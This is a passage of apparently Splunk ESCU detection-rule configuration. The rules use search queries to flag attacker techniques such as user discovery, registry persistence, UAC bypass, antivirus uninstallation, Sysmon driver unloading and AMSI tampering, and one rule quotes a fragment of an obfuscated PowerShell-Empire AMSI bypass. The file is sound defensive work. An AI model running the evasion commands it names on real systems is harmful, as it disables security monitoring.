ESCU - System Processes Run From Unexpected Locations - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions", "Unusual Processes", "Ransomware", "Masquerading - Rename System Utilities", "Qakbot", "Windows Error Reporting Service Elevation of Privilege Vulnerability", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1036.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats 
`security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_path !="C:\\Windows\\System32*" Processes.process_path !="C:\\Windows\\SysWOW64*" by Processes.dest Processes.user Processes.parent_process Processes.process_path Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `is_windows_system_file` | `system_processes_run_from_unexpected_locations_filter` [ESCU - System User Discovery With Query - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `query.exe` with command-line arguments utilized to discover the logged user. Red Teams and adversaries alike may leverage `query.exe` to identify system users on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `query.exe` with command-line arguments utilized to discover the logged user. Red Teams and adversaries alike may leverage `query.exe` to identify system users on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. 
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-13 action.escu.modification_date = 2021-09-13 action.escu.confidence = high action.escu.full_search_name = ESCU - System User Discovery With Query - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - System User Discovery With Query - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="query.exe") (Processes.process=*user*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | 
`security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `system_user_discovery_with_query_filter` [ESCU - System User Discovery With Whoami - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `whoami.exe` without any arguments. This windows native binary prints out the current logged user. Red Teams and adversaries alike may leverage `whoami.exe` to identify system users on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `whoami.exe` without any arguments. This windows native binary prints out the current logged user. Red Teams and adversaries alike may leverage `whoami.exe` to identify system users on a compromised endpoint for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - System User Discovery With Whoami - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Winter Vivern", "Active Directory Discovery", "Rhysida Ransomware", "Qakbot", "CISA AA23-347A"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - System User Discovery With Whoami - Rule action.correlationsearch.annotations = {"analytic_story": ["Winter Vivern", "Active Directory Discovery", "Rhysida Ransomware", "Qakbot", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="whoami.exe") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `system_user_discovery_with_whoami_filter` [ESCU - Time Provider Persistence Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious modification of time provider registry for persistence and autostart. 
This technique can allow the attacker to persist on the compromised host and autostart as soon as the machine boot up. This TTP can be a good indicator of suspicious behavior since this registry is not commonly modified by normal user or even an admin. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.003", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious modification of time provider registry for persistence and autostart. This technique can allow the attacker to persist on the compromised host and autostart as soon as the machine boot up. This TTP can be a good indicator of suspicious behavior since this registry is not commonly modified by normal user or even an admin. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. 
https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Time Provider Persistence Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Hermetic Wiper", "Windows Privilege Escalation", "Windows Persistence Techniques", "Windows Registry Abuse", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Time Provider Persistence Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Windows Privilege Escalation", "Windows Persistence Techniques", "Windows Registry Abuse", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.003", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious modification of time provider registry for persistence and autostart. This technique can allow the attacker to persist on the compromised host and autostart as soon as the machine boot up. 
This TTP can be a good indicator of suspicious behavior since this registry is not commonly modified by normal user or even an admin. action.notable.param.rule_title = Time Provider Persistence Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\CurrentControlSet\\Services\\W32Time\\TimeProviders*") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `time_provider_persistence_registry_filter` [ESCU - Trickbot Named Pipe - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is to detect potential trickbot infection through the create/connected named pipe to the system. This technique is used by trickbot to communicate to its c2 to post or get command during infection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = this search is to detect potential trickbot infection through the create/connected named pipe to the system. This technique is used by trickbot to communicate to its c2 to post or get command during infection. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and pipename from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. . 
action.escu.known_false_positives = unknown action.escu.creation_date = 2021-04-26 action.escu.modification_date = 2021-04-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Trickbot Named Pipe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Trickbot"] action.risk = 1 action.risk.param._risk_message = Possible Trickbot namedpipe created on $dest$ by $process_name$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Trickbot Named Pipe - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search is to detect potential trickbot infection through the create/connected named pipe to the system. This technique is used by trickbot to communicate to its c2 to post or get command during infection. 
action.notable.param.rule_title = Trickbot Named Pipe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode IN (17,18) PipeName="\\pipe\\*lacesomepipe" | stats min(_time) as firstTime max(_time) as lastTime count by dest user_id EventCode PipeName signature Image process_id | rename Image as process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `trickbot_named_pipe_filter` [ESCU - UAC Bypass MMC Load Unsigned Dll - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious loaded unsigned dll by MMC.exe application. This technique is commonly seen in attacker that tries to bypassed UAC feature or gain privilege escalation. This is done by modifying some CLSID registry that will trigger the mmc.exe to load the dll path action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548", "T1218.014"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious loaded unsigned dll by MMC.exe application. This technique is commonly seen in attacker that tries to bypassed UAC feature or gain privilege escalation. This is done by modifying some CLSID registry that will trigger the mmc.exe to load the dll path action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and imageloaded executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown. all of the dll loaded by mmc.exe is microsoft signed dll. 
action.escu.creation_date = 2021-07-12 action.escu.modification_date = 2021-07-12 action.escu.confidence = high action.escu.full_search_name = ESCU - UAC Bypass MMC Load Unsigned Dll - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = Suspicious unsigned $ImageLoaded$ loaded by $Image$ on endpoint $dest$ with EventCode $EventCode$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - UAC Bypass MMC Load Unsigned Dll - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548", "T1218.014"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious loaded unsigned dll by MMC.exe application. This technique is commonly seen in attacker that tries to bypassed UAC feature or gain privilege escalation. 
This is done by modifying some CLSID registry that will trigger the mmc.exe to load the dll path action.notable.param.rule_title = UAC Bypass MMC Load Unsigned Dll action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 ImageLoaded = "*.dll" Image = "*\\mmc.exe" Signed=false Company != "Microsoft Corporation" | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded Signed ProcessId OriginalFileName dest EventCode Company | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `uac_bypass_mmc_load_unsigned_dll_filter` [ESCU - UAC Bypass With Colorui COM Object - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a possible uac bypass using the colorui.dll COM Object. this technique was seen in so many malware and ransomware like lockbit where it make use of the colorui.dll COM CLSID to bypass UAC. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a possible uac bypass using the colorui.dll COM Object. this technique was seen in so many malware and ransomware like lockbit where it make use of the colorui.dll COM CLSID to bypass UAC. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = not so common. but 3rd part app may load this dll. 
action.escu.creation_date = 2021-08-13 action.escu.modification_date = 2021-08-13 action.escu.confidence = high action.escu.full_search_name = ESCU - UAC Bypass With Colorui COM Object - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Ransomware", "LockBit Ransomware"] action.risk = 1 action.risk.param._risk_message = The following module $ImageLoaded$ was loaded by a non-standard application on endpoint $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 48}, {"risk_object_field": "ImageLoaded", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - UAC Bypass With Colorui COM Object - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a possible uac bypass using the colorui.dll COM Object. this technique was seen in so many malware and ransomware like lockbit where it make use of the colorui.dll COM CLSID to bypass UAC. 
action.notable.param.rule_title = UAC Bypass With Colorui COM Object action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 ImageLoaded="*\\colorui.dll" process_name != "colorcpl.exe" NOT(Image IN("*\\windows\\*", "*\\program files*")) | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded process_name dest user_id EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `uac_bypass_with_colorui_com_object_filter` [ESCU - Uninstall App Using MsiExec - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a suspicious uninstallation of an application using msiexec. This technique was seen in the leaked Conti tools and scripts, where it is used to uninstall AV products via this command line. Using this command line to uninstall a product is not a common practice in enterprise networks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.007", "T1218"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search detects a suspicious uninstallation of an application using msiexec. This technique was seen in the leaked Conti tools and scripts, where it is used to uninstall AV products via this command line. Using this command line to uninstall a product is not a common practice in enterprise networks. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. 
Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown. action.escu.creation_date = 2021-08-09 action.escu.modification_date = 2021-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Uninstall App Using MsiExec - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] action.risk = 1 action.risk.param._risk_message = process $process_name$ with a cmdline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Uninstall App Using MsiExec - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.007", "T1218"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects a suspicious uninstallation of an application using msiexec. 
This technique was seen in the leaked Conti tools and scripts, where it is used to uninstall AV products via this command line. Using this command line to uninstall a product is not a common practice in enterprise networks. action.notable.param.rule_title = Uninstall App Using MsiExec action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=msiexec.exe Processes.process= "* /qn *" Processes.process= "*/X*" Processes.process= "*REBOOT=*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `uninstall_app_using_msiexec_filter` [ESCU - Unknown Process Using The Kerberos Protocol - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process performing an outbound connection on port 88, the port used by default by the Kerberos network authentication protocol. Typically, on a regular Windows endpoint, only the lsass.exe process is tasked with connecting to the Kerberos Key Distribution Center (KDC) to obtain Kerberos tickets. Identifying an unknown process using this protocol may be evidence of an adversary abusing the Kerberos protocol. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint", "Network_Traffic"] action.escu.eli5 = The following analytic identifies a process performing an outbound connection on port 88, the port used by default by the Kerberos network authentication protocol. Typically, on a regular Windows endpoint, only the lsass.exe process is tasked with connecting to the Kerberos Key Distribution Center (KDC) to obtain Kerberos tickets. Identifying an unknown process using this protocol may be evidence of an adversary abusing the Kerberos protocol. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Custom applications may leverage the Kerberos protocol. Filter as needed. 
action.escu.creation_date = 2024-01-23 action.escu.modification_date = 2024-01-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Unknown Process Using The Kerberos Protocol - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Unknown process $process_name$ using the kerberos protocol detected on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Unknown Process Using The Kerberos Protocol - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a process performing an outbound connection on port 88, the port used by default by the Kerberos network authentication protocol. Typically, on a regular Windows endpoint, only the lsass.exe process is tasked with connecting to the Kerberos Key Distribution Center (KDC) to obtain Kerberos tickets. Identifying an unknown process using this protocol may be evidence of an adversary abusing the Kerberos protocol. 
action.notable.param.rule_title = Unknown Process Using The Kerberos Protocol action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name!=lsass.exe by _time Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id dest [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port = 88 by All_Traffic.src All_Traffic.process_id All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename src as dest ] | table _time dest parent_process_name process_name process_path process process_id dest_port | `unknown_process_using_the_kerberos_protocol_filter` [ESCU - Unload Sysmon Filter Driver - Rule] action.escu = 0 action.escu.enabled = 1 description = Attackers often disable security tools to avoid detection. This search looks for the usage of process `fltMC.exe` to unload a Sysmon Driver that will stop sysmon from collecting the data. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Attackers often disable security tools to avoid detection. This search looks for the usage of process `fltMC.exe` to unload a Sysmon Driver that will stop sysmon from collecting the data. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. 
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown at the moment action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Unload Sysmon Filter Driver - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["CISA AA23-347A", "Disabling Security Tools"] action.risk = 1 action.risk.param._risk_message = Possible Sysmon filter driver unloading on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Unload Sysmon Filter Driver - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A", "Disabling Security Tools"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = 
user,dest action.notable.param.rule_description = Attackers often disable security tools to avoid detection. This search looks for the usage of process `fltMC.exe` to unload a Sysmon Driver that will stop sysmon from collecting the data. action.notable.param.rule_title = Unload Sysmon Filter Driver action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fltMC.exe AND Processes.process=*unload* AND Processes.process=*SysmonDrv* by Processes.process_name Processes.process_id Processes.parent_process_name Processes.process Processes.dest Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` |`unload_sysmon_filter_driver_filter`| table firstTime lastTime dest user count process_name process_id parent_process_name process [ESCU - Unloading AMSI via Reflection - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the behavior of AMSI being tampered with. Implemented natively in many frameworks, the command will look similar to `SEtValuE($Null,(New-OBJEct COLlECtionS.GenerIC.HAshSEt{[StrINg]))}$ReF=[ReF].AsSeMbLY.GeTTyPe("System.Management.Automation.Amsi"+"Utils")` taken from Powershell-Empire. 
\ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1562", "T1059.001", "T1059"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the behavior of AMSI being tampered with. Implemented natively in many frameworks, the command will look similar to `SEtValuE($Null,(New-OBJEct COLlECtionS.GenerIC.HAshSEt{[StrINg]))}$ReF=[ReF].AsSeMbLY.GeTTyPe("System.Management.Automation.Amsi"+"Utils")` taken from Powershell-Empire. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all 